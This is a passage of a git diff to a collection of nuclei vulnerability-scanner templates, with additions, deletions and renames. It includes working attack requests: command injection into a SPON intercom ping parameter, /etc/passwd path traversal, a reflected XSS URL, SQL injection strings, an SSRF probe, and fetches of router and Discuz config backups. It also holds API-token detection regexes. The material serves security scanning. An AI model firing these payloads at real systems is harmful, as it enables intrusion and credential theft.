regex - regex: - - "root:[x*]:0:0:" - part: body diff --git a/nuclei-templates/Other/Pictatic-API-key.yaml b/nuclei-templates/Other/Pictatic-API-key.yaml new file mode 100644 index 0000000000..946aed1ebf --- /dev/null +++ b/nuclei-templates/Other/Pictatic-API-key.yaml @@ -0,0 +1,13 @@ +id: pictatic-api-key +info: + name: Pictatic API Key + author: gaurang + severity: high + tags: token,file +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "sk_live_[0-9a-z]{32}" diff --git a/nuclei-templates/Other/RedMine-Detect.yaml b/nuclei-templates/Other/Redmine-Default-Login.yaml similarity index 100% rename from nuclei-templates/Other/RedMine-Detect.yaml rename to nuclei-templates/Other/Redmine-Default-Login.yaml diff --git a/nuclei-templates/Other/SPON-IP-rce.yaml b/nuclei-templates/Other/SPON-IP-rce.yaml new file mode 100644 index 0000000000..ce427145b6 --- /dev/null +++ b/nuclei-templates/Other/SPON-IP-rce.yaml @@ -0,0 +1,26 @@ +id: SPON-IP-rce +info: + name: SPON IP 网络对讲广播系统 rce + author: Str1am + severity: high + reference: https://poc.shuziguanxing.com/?#/publicIssueInfo#issueId=4578 + tags: SPON,rce +requests: + - raw: + - | + POST /php/ping.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 + + jsondata[ip]=%7Cecho aaaabbb&jsondata[type]=0 + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "aaaabbb" + part: body + condition: and diff --git a/nuclei-templates/Other/SQLInjection_ERROR.yaml b/nuclei-templates/Other/SQLInjection_ERROR.yaml index 34327d8061..471df51094 100644 --- a/nuclei-templates/Other/SQLInjection_ERROR.yaml +++ b/nuclei-templates/Other/SQLInjection_ERROR.yaml @@ -1,10 +1,13 @@ id: SQLInjection_ERROR + info: name: SQLINJECTION Detection - author: 0x240x23elu & OFJAAAH + author: mijan severity: High + requests: - method: GET + path: - "{{BaseURL}}'" - "{{BaseURL}} 1 or 1" @@ -33,15 +36,15 @@ requests: - "{{BaseURL}} 1' GROUP BY 1,2,--+" - "{{BaseURL}} 1' GROUP BY 1,2,3--+" - "{{BaseURL}} ' GROUP BY columnnames having 1=1 --" + extractors: - type: regex part: body regex: - "SQL syntax.*MySQL|Warning.*mysql_.*|valid MySQL result|MySqlClient.|mysqli_error|mysqli_query" - "PostgreSQL.*ERROR|Warning.*Wpg_.*|valid PostgreSQL resultNpgsql." - # - "Driver.* SQL[-_ ]*Server|OLE DB.* SQL Server|(W|A)SQL Server.*Driver|Warning.*mssql_.*|(W|A)SQL Server.*[0-9a-fA-F]{8}|(?s)Exception.*WSystem.Data.SqlClient.|(?s)Exception.*WRoadhouse.Cms.)" - "Microsoft Access Driver|JET Database Engine|Access Database Engine" - "ORA-[0-9][0-9][0-9][0-9]|Oracle error|Oracle.*Driver|Warning.*Woci_.*|Warning.*Wora_.*" - "CLI Driver.*DB2|DB2 SQL error|bdb2_w+" - "SQLite/JDBCDriver|SQLite.Exception|System.Data.SQLite.SQLiteException|Warning.*sqlite_.*|Warning.*SQLite3::|SQLITE_ERROR" - - "(?i)Warning.*sybase.*|Sybase message|Sybase.*Server message.*" + - "(?i)Warning.*sybase.*|Sybase message|Sybase.*Server message.*" \ No newline at end of file diff --git a/nuclei-templates/Other/sendgrid-api.yaml b/nuclei-templates/Other/Sendgrid-api.yaml similarity index 100% rename from nuclei-templates/Other/sendgrid-api.yaml rename to nuclei-templates/Other/Sendgrid-api.yaml diff --git a/nuclei-templates/Other/shipped100-sqli.yaml b/nuclei-templates/Other/Shipped100-sqli.yaml similarity index 100% rename from nuclei-templates/Other/shipped100-sqli.yaml rename to nuclei-templates/Other/Shipped100-sqli.yaml diff --git a/nuclei-templates/Other/shopify-token-11863.yaml b/nuclei-templates/Other/Shopify-token.yaml similarity index 100% rename from nuclei-templates/Other/shopify-token-11863.yaml rename to nuclei-templates/Other/Shopify-token.yaml diff --git a/nuclei-templates/Other/sitecore.yaml b/nuclei-templates/Other/SiteCore.yaml similarity index 100% rename from nuclei-templates/Other/sitecore.yaml rename to nuclei-templates/Other/SiteCore.yaml diff --git a/nuclei-templates/Other/Springboot-Loggers.yaml b/nuclei-templates/Other/Springboot-Loggers.yaml deleted file mode 100755 index 4c5f838a1d..0000000000 --- a/nuclei-templates/Other/Springboot-Loggers.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: Springboot-Loggers -info: - name: Detect Springboot Loggers - author: - - l0ne1y - description: |- - SprinBoot Loggers安全配置错误导致信息泄露 - 安全配置错误可以发生在一个应用程序堆栈的任何层面,包括网络服务,平台,web服务器、应用服务器、数据库、框架、自定义的代码、预安装的虚拟机、容器、存储等。 - 通常是由于不安全的默认配置、不完整的临时配置、开源云存储、错误的HTTP 标头配置以及包含敏感信息的详细错误信息所造成的,可能导致部分信息泄露。 - severity: low - remediation: |- - #### 官方修复方案: - 升级系统至无漏洞版本,或于官网下载安全补丁。 -requests: -- matchers: - - type: word - condition: and - part: body - words: - - '"loggers"' - - '"levels"' - - type: status - status: - - 200 - - type: word - condition: or - part: header - words: - - application/json - - application/vnd.spring-boot.actuator - - application/vnd.spring-boot.actuator.v1+json - matchers-condition: and - path: - - '{{BaseURL}}/loggers' - - '{{BaseURL}}/actuator/loggers' - method: GET diff --git a/nuclei-templates/Other/Square-access-token.yaml b/nuclei-templates/Other/Square-access-token.yaml new file mode 100644 index 0000000000..e0a5d2d1d0 --- /dev/null +++ b/nuclei-templates/Other/Square-access-token.yaml @@ -0,0 +1,14 @@ +id: square-access-token +info: + name: Square Access Token + author: gaurang,daffainfo + severity: high + tags: token,file,square +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "EAAAE[a-zA-Z0-9_-]{59}" + - "sq0atp-[0-9A-Za-z\\-_]{22}" diff --git a/nuclei-templates/Other/Square-oauth-secret.yaml b/nuclei-templates/Other/Square-oauth-secret.yaml new file mode 100644 index 0000000000..15571e71bc --- /dev/null +++ b/nuclei-templates/Other/Square-oauth-secret.yaml @@ -0,0 +1,16 @@ +id: square-oauth-secret + +info: + name: Square OAuth Secret + author: gaurang + severity: high + tags: token,file,square + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "sq0csp-[0-9A-Za-z\\-_]{43}" diff --git a/nuclei-templates/Other/Symantec-Messaging-Gateway.yaml b/nuclei-templates/Other/Symantec-Messaging-Gateway.yaml index 72a8c40af6..ab5c216ab1 100644 --- a/nuclei-templates/Other/Symantec-Messaging-Gateway.yaml +++ b/nuclei-templates/Other/Symantec-Messaging-Gateway.yaml @@ -1,19 +1,23 @@ id: symantec-messaging-gateway + info: name: Symantec Messaging Gateway LFI - author: Random-Robbie + author: Random_Robbie severity: medium description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal - tags: lfi + tags: lfi,messaging,symantec + requests: - method: GET path: - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/" + matchers-condition: and matchers: - type: word words: - "struts-default.xml" + - type: status status: - 200 diff --git a/nuclei-templates/Other/UnAuthenticated-Tensorboard.yaml b/nuclei-templates/Other/UnAuthenticated-Tensorboard.yaml deleted file mode 100755 index ed5a4d31ad..0000000000 --- a/nuclei-templates/Other/UnAuthenticated-Tensorboard.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: UnAuthenticated-Tensorboard -info: - name: Unauthenticated Tensorboard by Tensorflow - author: - - l0ne1y - description: |- - Tensorboard 未授权访问 - 在Web程序中由于权限控制不当,导致用户可以访问或操作到本身没有权限访问的数据即使越权访问。在本漏洞中攻击者可在不需要授权信息情况下进入到应用程序内部(管理)。 - severity: high - remediation: |- - #### 官方修复方案: - 升级系统至无漏洞版本,或于官网下载安全补丁。 -requests: -- matchers: - - type: word - condition: and - words: - - scalars - - loading_mechanism - - custom_scalars - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/data/plugins_listing' - method: GET diff --git a/nuclei-templates/Other/WSO2-2019-0598.yaml b/nuclei-templates/Other/WSO2-2019-0598.yaml deleted file mode 100644 index 4008c5dc28..0000000000 --- a/nuclei-templates/Other/WSO2-2019-0598.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: WSO2-2019-0598 -info: - name: WSO2 <5.8.0 - Server Side Request Forgery - author: Amnotacat - severity: medium - description: | - WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598 - remediation: | - Upgrade the product version to 5.8.0 or higher. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 6.8 - cwe-id: CWE-918 - tags: ssrf,wso2,shindig -requests: - - method: GET - path: - - "{{BaseURL}}/shindig/gadgets/proxy?container=default&url=http://oast.pro" - matchers-condition: and - matchers: - - type: word - words: - - "Interactsh Server" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/26 diff --git a/nuclei-templates/Other/Wireless-leakage.yaml b/nuclei-templates/Other/Wireless-leakage.yaml new file mode 100644 index 0000000000..573e2150e1 --- /dev/null +++ b/nuclei-templates/Other/Wireless-leakage.yaml @@ -0,0 +1,20 @@ +id: Wireless-leakage +info: + name: Wireless-leakage + author: str1am + severity: high + reference: + - https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=26003&highlight=cms + tags: 74cms,sqli +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/DownloadCfg/RouterCfm.cfg" + matchers-condition: and + matchers: + - type: word + words: + - "passwd" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/X-Host .yaml b/nuclei-templates/Other/X-Host.yaml similarity index 100% rename from nuclei-templates/Other/X-Host .yaml rename to nuclei-templates/Other/X-Host.yaml diff --git a/nuclei-templates/Other/X-Remote-Addr.yaml b/nuclei-templates/Other/X-Remote-Addr .yaml similarity index 100% rename from nuclei-templates/Other/X-Remote-Addr.yaml rename to nuclei-templates/Other/X-Remote-Addr .yaml diff --git a/nuclei-templates/Other/ZhongkeWangwei-fileRead.yaml b/nuclei-templates/Other/ZhongkeWangwei-fileRead.yaml deleted file mode 100644 index a2026cf72b..0000000000 --- a/nuclei-templates/Other/ZhongkeWangwei-fileRead.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: ZhongkeWangwei-fileRead - -info: - name: Discuz论坛系统config_global.php.bak等备份文件信息泄露 - author: Str1am - severity: high - tags: Discuz,leakage - -requests: - - method: GET - path: - - "{{BaseURL}}/config/config_global.php.bak" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "<?php" - - "dbuser" - - "dbpw" - part: body - condition: and diff --git a/nuclei-templates/Other/abyss-web-server.yaml b/nuclei-templates/Other/abyss-web-server-12.yaml similarity index 100% rename from nuclei-templates/Other/abyss-web-server.yaml rename to nuclei-templates/Other/abyss-web-server-12.yaml diff --git a/nuclei-templates/Other/accent-microcomputers-lfi-15.yaml b/nuclei-templates/Other/accent-microcomputers-lfi-15.yaml new file mode 100644 index 0000000000..bb76301640 --- /dev/null +++ b/nuclei-templates/Other/accent-microcomputers-lfi-15.yaml @@ -0,0 +1,29 @@ +id: accent-microcomputers-lfi +info: + name: Accent Microcomputers LFI + author: 0x_Akoko + severity: high + description: A local file inclusion vulnerability in Accent Microcomputers offerings could allow remote attackers to retrieve password files. + reference: + - https://cxsecurity.com/issue/WLB-2018050036 + - http://www.accent.com.pl + tags: microcomputers,accent,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: + cwe-id: CWE-22 +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?id=50&file=../../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/Other/accent-microcomputers-lfi-16.yaml b/nuclei-templates/Other/accent-microcomputers-lfi-16.yaml deleted file mode 100644 index 76805df1c1..0000000000 --- a/nuclei-templates/Other/accent-microcomputers-lfi-16.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: accent-microcomputers-lfi - -info: - name: Accent Microcomputers LFI - author: 0x_Akoko - severity: high - description: A local file inclusion vulnerability in Accent Microcomputers offerings could allow remote attackers to retrieve password files. - reference: - - https://cxsecurity.com/issue/WLB-2018050036 - - http://www.accent.com.pl - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-22 - tags: microcomputers,accent,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?id=50&file=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/Other/accessibility-helper-xss-19.yaml b/nuclei-templates/Other/accessibility-helper-xss.yaml similarity index 100% rename from nuclei-templates/Other/accessibility-helper-xss-19.yaml rename to nuclei-templates/Other/accessibility-helper-xss.yaml diff --git a/nuclei-templates/Other/acemanager-login-23.yaml b/nuclei-templates/Other/acemanager-login-23.yaml new file mode 100644 index 0000000000..bb8ee9d3fc --- /dev/null +++ b/nuclei-templates/Other/acemanager-login-23.yaml @@ -0,0 +1,32 @@ +id: acemanager-login + +info: + name: ACEmanager detect + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="ACEmanager"' + tags: panel,login,tech,acemanager + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>::: ACEmanager :::' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'ALEOS Version ([0-9.]+) \| Copyright &co' diff --git a/nuclei-templates/Other/acemanager-login.yaml b/nuclei-templates/Other/acemanager-login.yaml deleted file mode 100644 index 65b6f444c9..0000000000 --- a/nuclei-templates/Other/acemanager-login.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: acemanager-login - -info: - name: ACEmanager Detection - author: pussycat0x - severity: info - description: ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems. - metadata: - fofa-dork: 'app="ACEmanager"' - tags: panel,login,tech,acemanager - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '::: ACEmanager :::' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'ALEOS Version ([0-9.]+) \| Copyright &co' - -# Enhanced by mp on 2022/03/14 diff --git a/nuclei-templates/Other/acme-xss-28.yaml b/nuclei-templates/Other/acme-xss-28.yaml new file mode 100644 index 0000000000..06821bb4ae --- /dev/null +++ b/nuclei-templates/Other/acme-xss-28.yaml @@ -0,0 +1,19 @@ +id: acme-xss +info: + name: ACME / Let's Encrypt Reflected XSS + author: pdteam + severity: medium + tags: xss,acme +requests: + - method: GET + path: + - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E' + matchers-condition: and + matchers: + - type: word + words: + - "alert(document.domain)" + - type: word + words: + - "/xml" + - "/html" diff --git a/nuclei-templates/Other/acme-xss.yaml b/nuclei-templates/Other/acme-xss.yaml deleted file mode 100644 index e6e5af1c0d..0000000000 --- a/nuclei-templates/Other/acme-xss.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: acme-xss - -info: - name: ACME / Let's Encrypt Reflected XSS - author: pdteam - severity: low - tags: xss,acme - -requests: - - method: GET - path: - - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "alert(document.domain)" - - type: word - words: - - "/xml" - - "/html" diff --git a/nuclei-templates/Other/acontent-detect-33.yaml b/nuclei-templates/Other/acontent-detect-32.yaml similarity index 100% rename from nuclei-templates/Other/acontent-detect-33.yaml rename to nuclei-templates/Other/acontent-detect-32.yaml diff --git a/nuclei-templates/Other/acquia-takeover-35.yaml b/nuclei-templates/Other/acquia-takeover-35.yaml new file mode 100644 index 0000000000..3740c22e91 --- /dev/null +++ b/nuclei-templates/Other/acquia-takeover-35.yaml @@ -0,0 +1,21 @@ +id: acquia-takeover + +info: + name: Acquia Takeover Detection + author: pdteam + severity: info + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + name: acquia + words: + - If you are an Acquia Cloud customer and expect to see your site at this address + - The site you are looking for could not be found. + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/acquia-takeover.yaml b/nuclei-templates/Other/acquia-takeover.yaml deleted file mode 100644 index fa267bacc3..0000000000 --- a/nuclei-templates/Other/acquia-takeover.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: acquia-takeover - -info: - name: Acquia Takeover Detection - author: pdcommunity - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - name: acquia - words: - - If you are an Acquia Cloud customer and expect to see your site at this address - - The site you are looking for could not be found. - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/active-admin-exposure.yaml b/nuclei-templates/Other/active-admin-exposure.yaml index f4bdf291e6..ea5abea227 100644 --- a/nuclei-templates/Other/active-admin-exposure.yaml +++ b/nuclei-templates/Other/active-admin-exposure.yaml @@ -4,7 +4,7 @@ info: name: ActiveAdmin Admin Dasboard Exposure author: pdteam severity: info - tags: panel,activeadmin + tags: panel requests: - method: GET @@ -15,4 +15,4 @@ requests: words: - "active_admin_content" - "active_admin-" - condition: and + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/activemq-panel-53.yaml b/nuclei-templates/Other/activemq-panel-53.yaml new file mode 100644 index 0000000000..8ffb96e13a --- /dev/null +++ b/nuclei-templates/Other/activemq-panel-53.yaml @@ -0,0 +1,28 @@ +id: activemq-panel + +info: + name: Apache ActiveMQ Exposure + author: pdteam + severity: info + description: An Apache ActiveMQ implementation was discovered. + reference: + - https://activemq.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: panel,activemq,apache + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - '

Welcome to the Apache ActiveMQ!

' + - 'Apache ActiveMQ' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/activemq-panel.yaml b/nuclei-templates/Other/activemq-panel.yaml deleted file mode 100644 index 7f435fed9a..0000000000 --- a/nuclei-templates/Other/activemq-panel.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: activemq-panel - -info: - name: Apache ActiveMQ Exposure - author: pdteam - severity: info - description: An Apache ActiveMQ implementation was discovered. - reference: - - https://activemq.apache.org/ - classification: - cwe-id: CWE-200 - tags: panel,activemq,apache - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - '

Welcome to the Apache ActiveMQ!

' - - 'Apache ActiveMQ' - condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/acunetix-panel-57.yaml b/nuclei-templates/Other/acunetix-panel-57.yaml new file mode 100644 index 0000000000..d9bb730073 --- /dev/null +++ b/nuclei-templates/Other/acunetix-panel-57.yaml @@ -0,0 +1,30 @@ +id: acunetix-panel-detect + +info: + name: Acunetix Login Panel + author: joanbono + severity: info + description: An Acunetix login panel was detected. + reference: + - https://www.acunetix.com/ + classification: + cwe-id: CWE-200 + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/#/login" + + matchers-condition: and + matchers: + - type: word + words: + - 'Acunetix' + - '' + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/acunetix-panel.yaml b/nuclei-templates/Other/acunetix-panel.yaml deleted file mode 100644 index bf7ce829d1..0000000000 --- a/nuclei-templates/Other/acunetix-panel.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: acunetix-panel-detect - -info: - name: Acunetix Panel detector - author: joanbono - severity: info - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/#/login" - - matchers-condition: and - matchers: - - type: word - words: - - 'Acunetix' - - '' - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/ad-widget-lfi-124.yaml b/nuclei-templates/Other/ad-widget-lfi.yaml similarity index 100% rename from nuclei-templates/Other/ad-widget-lfi-124.yaml rename to nuclei-templates/Other/ad-widget-lfi.yaml diff --git a/nuclei-templates/Other/adb-backup-enabled-62.yaml b/nuclei-templates/Other/adb-backup-enabled-62.yaml deleted file mode 100644 index 2f4a88df0a..0000000000 --- a/nuclei-templates/Other/adb-backup-enabled-62.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: adb-backup-enabled - -info: - name: ADB Backup Enabled - author: gaurang - severity: low - tags: android,file - -file: - - extensions: - - all - - matchers: - - type: word - words: - - "android:allowBackup=\"true\"" \ No newline at end of file diff --git a/nuclei-templates/Other/adb-backup-enabled-63.yaml b/nuclei-templates/Other/adb-backup-enabled-63.yaml new file mode 100644 index 0000000000..5c756ded96 --- /dev/null +++ b/nuclei-templates/Other/adb-backup-enabled-63.yaml @@ -0,0 +1,23 @@ +id: adb-backup-enabled + +info: + name: ADB Backup Enabled + author: gaurang + severity: low + description: ADB Backup is enabled, which allows the backup and restore of an app's private data. + reference: + - https://adb-backup.com/ + classification: + cwe-id: CWE-200 + remediation: Ensure proper access or disable completely. + tags: android,file + +file: + - extensions: + - all + matchers: + - type: word + words: + - "android:allowBackup=\"true\"" + +# Enhanced by mp on 2022/02/09 diff --git a/nuclei-templates/Other/addeventlistener-detect-64.yaml b/nuclei-templates/Other/addeventlistener-detect-64.yaml index 0b4b57ca9d..8150161f44 100644 --- a/nuclei-templates/Other/addeventlistener-detect-64.yaml +++ b/nuclei-templates/Other/addeventlistener-detect-64.yaml @@ -1,19 +1,20 @@ id: addeventlistener-detect info: - name: AddEventlistener detection - author: yavolo + name: DOM EventListener detection + author: yavolo,dwisiswant0 severity: info - tags: xss - reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source + reference: + - https://portswigger.net/web-security/dom-based/controlling-the-web-message-source + tags: xss,misc requests: - method: GET path: - - '{{BaseURL}}' + - "{{BaseURL}}" matchers: - - type: word - words: - - 'window.addEventListener(' - part: body \ No newline at end of file + - type: regex + part: body + regex: + - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 diff --git a/nuclei-templates/Other/adiscon-loganalyzer-67.yaml b/nuclei-templates/Other/adiscon-loganalyzer-67.yaml deleted file mode 100644 index 8c3441c865..0000000000 --- a/nuclei-templates/Other/adiscon-loganalyzer-67.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: adiscon-loganalyzer -info: - name: Detect exposed Adiscon LogAnalyzer - author: geeknik - severity: high - description: Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services. - reference: https://loganalyzer.adiscon.com/ - tags: adiscon,loganalyzer,syslog,exposures -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Adiscon LogAnalyzer' - - 'value="SYSLOG"' - - 'value="EVTRPT"' - - 'value="WEBLOG"' - condition: and - - type: status - status: - - 200 - - type: word - part: header - words: - - 'text/html' diff --git a/nuclei-templates/Other/adiscon-loganalyzer-70.yaml b/nuclei-templates/Other/adiscon-loganalyzer-70.yaml new file mode 100644 index 0000000000..086763aa89 --- /dev/null +++ b/nuclei-templates/Other/adiscon-loganalyzer-70.yaml @@ -0,0 +1,39 @@ +id: adiscon-loganalyzer + +info: + name: Adiscon LogAnalyzer Detection + author: geeknik + severity: high + description: Adiscon LogAnalyzer was discovered. Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing and analysis of real-time network events and reporting services. + reference: + - https://loganalyzer.adiscon.com/ + classification: + cwe-id: CWE-200 + tags: adiscon,loganalyzer,syslog,exposures + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Adiscon LogAnalyzer' + - 'value="SYSLOG"' + - 'value="EVTRPT"' + - 'value="WEBLOG"' + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/html' + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adminer-panel-75.yaml b/nuclei-templates/Other/adminer-panel-75.yaml new file mode 100644 index 0000000000..adf4b4c859 --- /dev/null +++ b/nuclei-templates/Other/adminer-panel-75.yaml @@ -0,0 +1,50 @@ +id: adminer-panel + +info: + name: Adminer Login Panel + author: random_robbie,meme-lord,ritikchaddha + severity: info + description: An Adminer login panel was detected. + reference: + - https://blog.sorcery.ie/posts/adminer/ + classification: + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: title:"Login - Adminer" + tags: panel,adminer + +requests: + - method: GET + path: + - '{{BaseURL}}/adminer.php' + - '{{BaseURL}}/_adminer.php' + - '{{BaseURL}}/adminer/' + - '{{BaseURL}}/editor.php' + - '{{BaseURL}}/mysql.php' + - '{{BaseURL}}/sql.php' + - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php' + - '{{BaseURL}}/admin.php' + + headers: + Accept-Language: en-US,en;q=0.5 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Login - Adminer" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+)' + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adminer-panel-fuzz-72.yaml b/nuclei-templates/Other/adminer-panel-fuzz-72.yaml new file mode 100644 index 0000000000..e80d5d2ff8 --- /dev/null +++ b/nuclei-templates/Other/adminer-panel-fuzz-72.yaml @@ -0,0 +1,48 @@ +id: adminer-panel-fuzz + +info: + name: Adminer Login Panel Fuzz + author: random_robbie,meme-lord + severity: info + reference: + - https://blog.sorcery.ie/posts/adminer/ + tags: fuzz,adminer,login + + # <= 4.2.4 can have unauthenticated RCE via SQLite driver + # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL + # Most versions have some kind of SSRF usability + # Is generally handy if you find SQL creds + +requests: + + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Referer: {{BaseURL}} + + payloads: + path: helpers/wordlists/adminer-paths.txt + + threads: 50 + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + condition: and + words: + - "- Adminer" + - "partial(verifyVersion" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+)' diff --git a/nuclei-templates/Other/adminer-panel-fuzz-73.yaml b/nuclei-templates/Other/adminer-panel-fuzz-73.yaml deleted file mode 100644 index 9cfa2fa2db..0000000000 --- a/nuclei-templates/Other/adminer-panel-fuzz-73.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: adminer-panel-fuzz -info: - name: Adminer Login Panel Fuzz - author: random_robbie,meme-lord - severity: info - reference: - - https://blog.sorcery.ie/posts/adminer/ - tags: fuzz,adminer,login - # <= 4.2.4 can have unauthenticated RCE via SQLite driver - # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL - # Most versions have some kind of SSRF usability - # Is generally handy if you find SQL creds -requests: - - raw: - - | - GET {{path}} HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Referer: {{BaseURL}} - payloads: - path: helpers/wordlists/adminer-paths.txt - threads: 50 - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - condition: and - words: - - "- Adminer" - - "partial(verifyVersion" - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '([0-9.]+)' diff --git a/nuclei-templates/Other/adminer-panel.yaml b/nuclei-templates/Other/adminer-panel.yaml deleted file mode 100644 index b2cf28a10c..0000000000 --- a/nuclei-templates/Other/adminer-panel.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: adminer-panel - -info: - name: Adminer Login Panel - author: random_robbie,meme-lord - description: An Adminer login panel was detected. - severity: info - reference: - - https://blog.sorcery.ie/posts/adminer/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - metadata: - shodan-query: title:"Login - Adminer" - tags: panel,adminer - -requests: - - method: GET - path: - - '{{BaseURL}}/adminer.php' - - '{{BaseURL}}/_adminer.php' - - '{{BaseURL}}/adminer/' - - '{{BaseURL}}/editor.php' - - '{{BaseURL}}/mysql.php' - - '{{BaseURL}}/sql.php' - - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php' - - headers: - Accept-Language: en-US,en;q=0.5 - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - 